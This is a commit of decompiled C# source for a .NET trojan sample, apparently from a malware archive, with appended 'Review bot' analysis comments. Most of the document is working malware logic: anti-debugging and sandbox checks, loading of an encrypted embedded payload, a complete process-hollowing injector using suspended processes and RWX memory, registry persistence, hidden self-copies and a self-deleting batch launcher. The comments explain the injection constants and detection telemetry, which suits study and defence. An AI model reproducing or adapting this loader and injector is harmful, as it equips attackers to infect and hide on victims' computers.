auto-decompiled msil via petikvx

add
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
@@ -0,0 +1,5 @@
using System.Reflection;
using System.Runtime.CompilerServices;
[assembly: SuppressIldasm]
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,48 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BC59CD54-9FCB-4971-9624-E42E6033A01C}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>server2</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_0002.cs" />
<Compile Include="_0003.cs" />
<Compile Include="_0005.cs" />
<Compile Include="_0006.cs" />
<Compile Include="_0008.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="  " />
<EmbeddedResource Include="file" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "server2", "Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.csproj", "{BC59CD54-9FCB-4971-9624-E42E6033A01C}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BC59CD54-9FCB-4971-9624-E42E6033A01C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BC59CD54-9FCB-4971-9624-E42E6033A01C}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BC59CD54-9FCB-4971-9624-E42E6033A01C}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BC59CD54-9FCB-4971-9624-E42E6033A01C}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,457 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: server2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A78406EB-6936-436A-BB47-86E06CAA33E0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Threading;
using System.Windows.Forms;
internal sealed class \u0002
{
private static \u0003 \u0002 = new \u0003();
private static string \u0003 = \u0008.\u0002(-626735724);
private static string \u0005 = \u0008.\u0002(-626735724);
private static byte[] \u0008 = new byte[7]
{
(byte) 98,
(byte) 87,
(byte) 76,
(byte) 65,
(byte) 54,
(byte) 43,
(byte) 32
};
private static byte[] \u0006;
private static bool \u000E = true;
private static bool \u000F = true;
private static bool \u0002\u2000 = true;
private static bool \u0003\u2000 = true;
private static bool \u0005\u2000 = true;
private static bool \u0008\u2000 = true;
private static bool \u0006\u2000 = true;
private static bool \u000E\u2000 = true;
private static bool \u000F\u2000 = true;
private static bool \u0002\u2001 = true;
private static bool \u0003\u2001 = true;
private static bool \u0005\u2001 = true;
private static bool \u0008\u2001 = true;
private static bool \u0006\u2001 = true;
private static bool \u000E\u2001 = true;
private static bool \u000F\u2001 = false;
private static string \u0002\u2002 = \u0008.\u0002(-626735683);
private static string \u0003\u2002 = \u0008.\u0002(-626735663);
private static bool \u0005\u2002 = false;
private static bool \u0008\u2002 = false;
private static bool \u0006\u2002 = false;
private static bool \u000E\u2002 = false;
private static bool \u000F\u2002 = false;
private static bool \u0002\u2003 = true;
private static string \u0003\u2003 = \u0008.\u0002(-626735669);
private static bool \u0005\u2003 = true;
private static bool \u0008\u2003 = false;
private static int \u0006\u2003 = 0;
private static ThreadStart \u000E\u2003;
private static bool \u0002(string _param0) => Process.GetProcessesByName(_param0).Length > 0;
private static void \u0002(string _param0, string _param1)
{
int num = (int) MessageBox.Show(_param0, _param1, MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
private static void \u0002() => Console.Write(\u0008.\u0002(-626735471));
private static void \u0002(string[] _param0)
{
if (!(\u0002.\u0003 == \u0002.\u0005))
return;
\u0002.\u0002();
if (\u0002.\u000F\u2001)
{
try
{
if (\u0002.\u000E\u2003 == null)
\u0002.\u000E\u2003 = new ThreadStart(\u0002.\u0005);
new Thread(\u0002.\u000E\u2003).Start();
}
catch
{
}
}
\u0002.\u0002();
if (\u0002.\u000E)
{
try
{
if (Debugger.IsAttached)
return;
}
catch
{
}
}
if (\u0002.\u000F)
{
try
{
long ticks = DateTime.Now.Ticks;
Thread.Sleep(10);
if (DateTime.Now.Ticks - ticks < 10L)
return;
}
catch
{
}
}
if (\u0002.\u0002\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735482)))
return;
}
catch
{
}
}
if (\u0002.\u0003\u2000)
{
try
{
Form form = new Form();
form.Text = \u0008.\u0002(-626735436);
form.Opacity = 0.0;
form.ShowInTaskbar = false;
form.Show();
if (form.Text == \u0008.\u0002(-626735431))
return;
form.Close();
}
catch
{
}
}
if (\u0002.\u0005\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735446)))
return;
}
catch
{
}
}
if (\u0002.\u0008\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735400)))
return;
}
catch
{
}
}
if (\u0002.\u0006\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735410)))
return;
}
catch
{
}
}
if (\u0002.\u000E\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735363)))
return;
}
catch
{
}
}
if (\u0002.\u000F\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735386)))
return;
}
catch
{
}
}
if (\u0002.\u0002\u2001)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735595)))
return;
}
catch
{
}
}
\u0002.\u0002();
if (\u0002.\u0008\u2003)
{
try
{
Thread.Sleep(\u0002.\u0006\u2003 * 1000);
}
catch
{
}
}
\u0002.\u0002();
try
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(\u0008.\u0002(-626735589));
\u0002.\u0002();
StreamReader streamReader = new StreamReader(manifestResourceStream);
string end = streamReader.ReadToEnd();
\u0002.\u0002();
streamReader.Close();
\u0002.\u0006 = Convert.FromBase64String(end);
try
{
\u0002.\u0002();
Thread thread = new Thread(new ThreadStart(\u0002.\u0003));
\u0002.\u0002();
thread.Start();
\u0002.\u0002();
}
catch
{
}
}
catch
{
}
\u0002.\u0002();
if (\u0002.\u0005\u2002)
{
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735604), true).SetValue(\u0008.\u0002(-626735538), (object) \u0008.\u0002(-626735514), RegistryValueKind.DWord);
}
catch
{
}
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-626735506));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735186), (object) \u0008.\u0002(-626735514), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735186), (object) \u0008.\u0002(-626735514), RegistryValueKind.DWord);
Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735186), (object) \u0008.\u0002(-626735514), RegistryValueKind.DWord);
}
catch
{
}
if (\u0002.\u0008\u2002)
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735138)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-626735138));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735138), true).SetValue(\u0008.\u0002(-626735127), (object) \u0008.\u0002(-626735336), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735138), true).SetValue(\u0008.\u0002(-626735127), (object) \u0008.\u0002(-626735336), RegistryValueKind.DWord);
}
if (\u0002.\u0006\u2002)
{
try
{
new Process()
{
StartInfo = {
FileName = \u0008.\u0002(-626735360),
Arguments = \u0008.\u0002(-626735308),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
if (\u0002.\u000E\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-626735506));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735291), (object) \u0008.\u0002(-626735234), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735291), (object) \u0008.\u0002(-626735234), RegistryValueKind.DWord);
}
catch
{
}
}
if (\u0002.\u000F\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-626735506));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735258), (object) \u0008.\u0002(-626735234), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735258), (object) \u0008.\u0002(-626735234), RegistryValueKind.DWord);
}
catch
{
}
}
}
\u0002.\u0002();
if (\u0002.\u0002\u2003)
{
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735604), true).SetValue(\u0008.\u0002(-626735971), (object) \u0008.\u0002(-626735336), RegistryValueKind.DWord);
}
catch
{
}
try
{
FileStream fileStream1 = new FileStream(Process.GetCurrentProcess().MainModule.FileName, FileMode.Open, FileAccess.Read);
byte[] buffer = new byte[fileStream1.Length];
fileStream1.Read(buffer, 0, buffer.Length);
fileStream1.Close();
FileStream fileStream2 = new FileStream(Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003, FileMode.Create);
fileStream2.Write(buffer, 0, buffer.Length);
fileStream2.Close();
fileStream2.Dispose();
FileStream fileStream3 = new FileStream(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003, FileMode.Create);
fileStream3.Write(buffer, 0, buffer.Length);
fileStream3.Close();
fileStream3.Dispose();
File.SetAttributes(Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003, FileAttributes.Hidden);
File.SetAttributes(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003, FileAttributes.Hidden);
}
catch
{
}
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735939), true).SetValue(\u0008.\u0002(-626735927), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003));
Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-626735939), true).SetValue(\u0008.\u0002(-626735927), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003));
}
catch
{
}
if (\u0002.\u0005\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735897)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-626735897));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735897), true).SetValue(\u0008.\u0002(-626735927), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003));
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735897), true).SetValue(\u0008.\u0002(-626735927), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003));
}
catch
{
}
}
}
\u0002.\u0002();
if (!\u0002.\u0005\u2003)
return;
try
{
if (Application.ExecutablePath.Contains(Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000))))
return;
string str = \u0008.\u0002(-626736083) + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + \u0008.\u0002(-626736034) + (object) '"' + Path.GetFileName(Application.ExecutablePath) + (object) '"' + \u0008.\u0002(-626736055);
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626736006));
textWriter.WriteLine(str);
textWriter.Close();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626736006)),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
public static void \u0003()
{
try
{
\u0002.\u0002();
Assembly assembly = Assembly.Load(\u0002.\u0006);
MethodInfo entryPoint = assembly.EntryPoint;
\u0002.\u0002();
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[1]
{
(object) new string[0]
});
}
catch
{
try
{
\u0002.\u0002();
Assembly assembly = Assembly.Load(\u0002.\u0006);
MethodInfo entryPoint = assembly.EntryPoint;
\u0002.\u0002();
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[0]);
}
catch
{
try
{
\u0002.\u0002();
MethodInfo entryPoint = Assembly.Load(\u0002.\u0006).EntryPoint;
\u0002.\u0002();
entryPoint.Invoke((object) null, (object[]) null);
}
catch
{
try
{
\u0002.\u0002();
\u0002.\u0002.\u0002(\u0002.\u0006, string.Empty, Application.ExecutablePath);
\u0002.\u0002();
}
catch
{
}
}
}
}
}
private static void \u0005() => \u0002.\u0002(\u0002.\u0002\u2002, \u0002.\u0003\u2002);
}
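Review bot: The entry routine `\u0002(string[])` carries no analyst annotation, and because every string is produced at runtime by `\u0008.\u0002(int)` its behaviour is hard to triage from this listing alone. A header comment would help, e.g. `// Loader: anti-analysis gates (Debugger.IsAttached, Sleep(10) tick delta, process-name lookups, hidden-form title check) -> Base64 embedded resource -> Assembly.Load on a new thread`, plus a second line noting that the flag-gated tail writes registry values under CurrentUser and LocalMachine and copies the running image to two locations with `FileAttributes.Hidden`. The key and value names are not visible in this file, so the purpose of the registry writes (presumably autostart and policy changes) should be confirmed against the decrypted string table before it is recorded as an indicator. Every `catch` block is empty, so failed steps leave no trace in the process itself and detection has to rely on host telemetry such as registry-set and file-creation events.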
@@ -0,0 +1,310 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: server2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A78406EB-6936-436A-BB47-86E06CAA33E0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe
using System;
using System.Runtime.InteropServices;
internal sealed class \u0003
{
private void \u0002() => Console.Write(\u0008.\u0002(-626735471));
[DllImport("kernel32")]
private static extern IntPtr GetProcAddress(IntPtr _param0, string _param1);
[DllImport("kernel32")]
private static extern IntPtr LoadLibrary(string _param0);
public void \u0002(byte[] _param1, string _param2, string _param3)
{
\u0003.\u0002\u2001 obj1 = new \u0003.\u0002\u2001();
\u0003.\u0006\u2001 obj2 = new \u0003.\u0006\u2001();
this.\u0002();
\u0003.\u0002\u2002 structure1 = new \u0003.\u0002\u2002();
\u0003.\u0006\u2000 structure2 = new \u0003.\u0006\u2000();
this.\u0002();
\u0003.\u000E\u2000 obj3 = new \u0003.\u000E\u2000();
\u0003.\u000F\u2001 obj4 = new \u0003.\u000F\u2001();
this.\u0002();
structure2.\u0002 = (uint) Marshal.SizeOf((object) structure2);
obj4.\u0002 = 65543U;
this.\u0002();
GCHandle gcHandle = GCHandle.Alloc((object) _param1, GCHandleType.Pinned);
int int32 = gcHandle.AddrOfPinnedObject().ToInt32();
this.\u0002();
gcHandle.Free();
\u0003.\u0002\u2001 structure3 = (\u0003.\u0002\u2001) Marshal.PtrToStructure((IntPtr) int32, typeof (\u0003.\u0002\u2001));
this.\u0002();
\u0003.\u0006\u2001 structure4 = (\u0003.\u0006\u2001) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0006\u2001), typeof (\u0003.\u0006\u2001));
this.\u0002();
if (structure4.\u0002 != 17744U || structure3.\u0002 != (ushort) 23117)
return;
\u0003.\u0002 forFunctionPointer1 = (\u0003.\u0002) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735843)), typeof (\u0003.\u0002));
\u0003.\u0005 forFunctionPointer2 = (\u0003.\u0005) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735864)), \u0008.\u0002(-626735816)), typeof (\u0003.\u0005));
\u0003.\u0008 forFunctionPointer3 = (\u0003.\u0008) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735779)), typeof (\u0003.\u0008));
this.\u0002();
\u0003.\u0003 forFunctionPointer4 = (\u0003.\u0003) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735800)), typeof (\u0003.\u0003));
\u0003.\u0006 forFunctionPointer5 = (\u0003.\u0006) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735773)), typeof (\u0003.\u0006));
\u0003.\u000E forFunctionPointer6 = (\u0003.\u000E) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626736488)), typeof (\u0003.\u000E));
this.\u0002();
\u0003.\u000F forFunctionPointer7 = (\u0003.\u000F) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626736463)), typeof (\u0003.\u000F));
this.\u0002();
int num1 = forFunctionPointer1(_param3, _param2, IntPtr.Zero, IntPtr.Zero, false, (\u0003.\u0002\u2000) 4, IntPtr.Zero, (string) null, ref structure2, out obj3) ? 1 : 0;
int num2 = forFunctionPointer2(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000) ? 1 : 0;
this.\u0002();
if (!forFunctionPointer3(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000, structure4.\u0005.\u000E\u2001, (\u0003.\u0008\u2000) 12288, (\u0003.\u0005\u2000) 64))
return;
int num3 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000, _param1, structure4.\u0005.\u000F\u2001, (object) null) ? 1 : 0;
this.\u0002();
for (int index1 = 0; index1 <= (int) structure4.\u0003.\u0003 - 1; ++index1)
{
structure1 = (\u0003.\u0002\u2002) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0006\u2001 + Marshal.SizeOf((object) structure4) + Marshal.SizeOf((object) structure1) * index1), typeof (\u0003.\u0002\u2002));
byte[] numArray = new byte[(IntPtr) structure1.\u0008];
for (int index2 = 0; index2 <= (int) structure1.\u0008 - 1; ++index2)
numArray[index2] = _param1[(long) structure1.\u0006 + (long) index2];
this.\u0002();
int num4 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) (structure4.\u0005.\u0005\u2000 + structure1.\u0005), numArray, structure1.\u0008, (object) null) ? 1 : 0;
}
int num5 = forFunctionPointer5(obj3.\u0003, ref obj4) ? 1 : 0;
this.\u0002();
byte[] bytes = BitConverter.GetBytes(structure4.\u0005.\u0005\u2000);
int num6 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) (obj4.\u0002\u2001 + 8U), bytes, (uint) bytes.Length, (object) null) ? 1 : 0;
obj4.\u0008\u2001 = structure4.\u0005.\u0005\u2000 + structure4.\u0005.\u000F;
this.\u0002();
int num7 = forFunctionPointer6(obj3.\u0003, ref obj4) ? 1 : 0;
int num8 = (int) forFunctionPointer7(obj3.\u0003);
}
private delegate bool \u0002(
string _param1,
string _param2,
IntPtr _param3,
IntPtr _param4,
bool _param5,
\u0003.\u0002\u2000 _param6,
IntPtr _param7,
string _param8,
ref \u0003.\u0006\u2000 _param9,
out \u0003.\u000E\u2000 _param10);
private delegate bool \u0003(
IntPtr _param1,
IntPtr _param2,
byte[] _param3,
uint _param4,
object _param5);
private delegate bool \u0005(IntPtr _param1, IntPtr _param2);
private delegate bool \u0006(IntPtr _param1, ref \u0003.\u000F\u2001 _param2);
private delegate bool \u0008(
IntPtr _param1,
IntPtr _param2,
uint _param3,
\u0003.\u0008\u2000 _param4,
\u0003.\u0005\u2000 _param5);
private delegate bool \u000E(IntPtr _param1, [In] ref \u0003.\u000F\u2001 _param2);
private delegate uint \u000F(IntPtr _param1);
private enum \u0002\u2000 : uint
{
}
private struct \u0002\u2002
{
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public byte[] \u0002;
public uint \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public ushort \u0002\u2000;
public ushort \u0003\u2000;
public uint \u0005\u2000;
}
private enum \u0003\u2000 : uint
{
}
private enum \u0005\u2000 : uint
{
}
private struct \u0006\u2000
{
public uint \u0002;
public string \u0003;
public string \u0005;
public string \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public uint \u0002\u2000;
public uint \u0003\u2000;
public uint \u0005\u2000;
public uint \u0008\u2000;
public uint \u0006\u2000;
public short \u000E\u2000;
public short \u000F\u2000;
public IntPtr \u0002\u2001;
public IntPtr \u0003\u2001;
public IntPtr \u0005\u2001;
public IntPtr \u0008\u2001;
}
private enum \u0008\u2000 : uint
{
}
private struct \u000E\u2000
{
public IntPtr \u0002;
public IntPtr \u0003;
public uint \u0005;
public uint \u0008;
}
private struct \u000F\u2000
{
public int \u0002;
public IntPtr \u0003;
public bool \u0005;
}
private struct \u0002\u2001
{
public ushort \u0002;
public ushort \u0003;
public ushort \u0005;
public ushort \u0008;
public ushort \u0006;
public ushort \u000E;
public ushort \u000F;
public ushort \u0002\u2000;
public ushort \u0003\u2000;
public ushort \u0005\u2000;
public ushort \u0008\u2000;
public ushort \u0006\u2000;
public ushort \u000E\u2000;
public ushort \u000F\u2000;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] \u0002\u2001;
public ushort \u0003\u2001;
public ushort \u0005\u2001;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] \u0008\u2001;
public int \u0006\u2001;
}
private struct \u0003\u2001
{
public ushort \u0002;
public ushort \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public ushort \u000E;
public ushort \u000F;
}
private struct \u0005\u2001
{
public uint \u0002;
public uint \u0003;
}
private struct \u0006\u2001
{
public uint \u0002;
public \u0003.\u0003\u2001 \u0003;
public \u0003.\u0008\u2001 \u0005;
}
private struct \u0008\u2001
{
public ushort \u0002;
public byte \u0003;
public byte \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public uint \u0002\u2000;
public uint \u0003\u2000;
public uint \u0005\u2000;
public uint \u0008\u2000;
public uint \u0006\u2000;
public ushort \u000E\u2000;
public ushort \u000F\u2000;
public ushort \u0002\u2001;
public ushort \u0003\u2001;
public ushort \u0005\u2001;
public ushort \u0008\u2001;
public uint \u0006\u2001;
public uint \u000E\u2001;
public uint \u000F\u2001;
public uint \u0002\u2002;
public ushort \u0003\u2002;
public ushort \u0005\u2002;
public uint \u0008\u2002;
public uint \u0006\u2002;
public uint \u000E\u2002;
public uint \u000F\u2002;
public uint \u0002\u2003;
public uint \u0003\u2003;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public \u0003.\u0005\u2001[] \u0005\u2003;
}
private struct \u000E\u2001
{
public uint \u0002;
public uint \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] \u0002\u2000;
public uint \u0003\u2000;
}
private struct \u000F\u2001
{
public uint \u0002;
public uint \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public \u0003.\u000E\u2001 \u0002\u2000;
public uint \u0003\u2000;
public uint \u0005\u2000;
public uint \u0008\u2000;
public uint \u0006\u2000;
public uint \u000E\u2000;
public uint \u000F\u2000;
public uint \u0002\u2001;
public uint \u0003\u2001;
public uint \u0005\u2001;
public uint \u0008\u2001;
public uint \u0006\u2001;
public uint \u000E\u2001;
public uint \u000F\u2001;
public uint \u0002\u2002;
public uint \u0003\u2002;
public uint \u0005\u2002;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] \u0008\u2002;
}
}
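Review bot: The magic numbers in `\u0002(byte[], string, string)` are undocumented, which hides that this is a PE-image injection routine. I would annotate them in place: `// 23117 = 0x5A4D "MZ", 17744 = 0x4550 "PE"` on the header check, `// 4 = CREATE_SUSPENDED` on the first delegate call, `// 12288 = MEM_COMMIT|MEM_RESERVE, 64 = PAGE_EXECUTE_READWRITE` on the allocation, and `// 65543 = 0x10007, CONTEXT_FULL on x86` on the context flags. The function names are resolved through `GetProcAddress` from encrypted strings, so the mapping of the seven delegates to specific Win32 APIs is inferred from their signatures and should be marked as such in the comments. For detection, the observable sequence is a child process started suspended (the caller in the first file passes `Application.ExecutablePath`), an RWX allocation with cross-process writes into it, and a thread-context change before resume.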
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: server2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A78406EB-6936-436A-BB47-86E06CAA33E0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe
using System.Runtime.InteropServices;
internal sealed class \u0005
{
internal static \u0005.\u0002 \u0002;
[StructLayout(LayoutKind.Explicit, Size = 7, Pack = 1)]
private struct \u0002
{
}
}
@@ -0,0 +1,31 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: server2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A78406EB-6936-436A-BB47-86E06CAA33E0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe
internal static class \u0006
{
public static byte[] \u0002(byte[] _param0, byte[] _param1)
{
byte num1 = _param0[1];
int length = _param1.Length;
byte num2 = (byte) (length + 11 ^ (int) num1 + 7);
uint num3 = (uint) (((int) _param0[0] | (int) _param0[2] << 8) + ((int) num2 << 3));
ushort num4 = 0;
for (int index = 0; index < length; ++index)
{
if ((index & 1) == 0)
{
num3 = (uint) ((int) num3 * 214013 + 2531011);
num4 = (ushort) (num3 >> 16);
}
byte num5 = (byte) num4;
num4 >>= 8;
byte num6 = _param1[index];
_param1[index] = (byte) ((uint) ((int) num6 ^ (int) num1 ^ (int) num2 + 3) ^ (uint) num5);
num2 = num6;
}
return _param1;
}
}
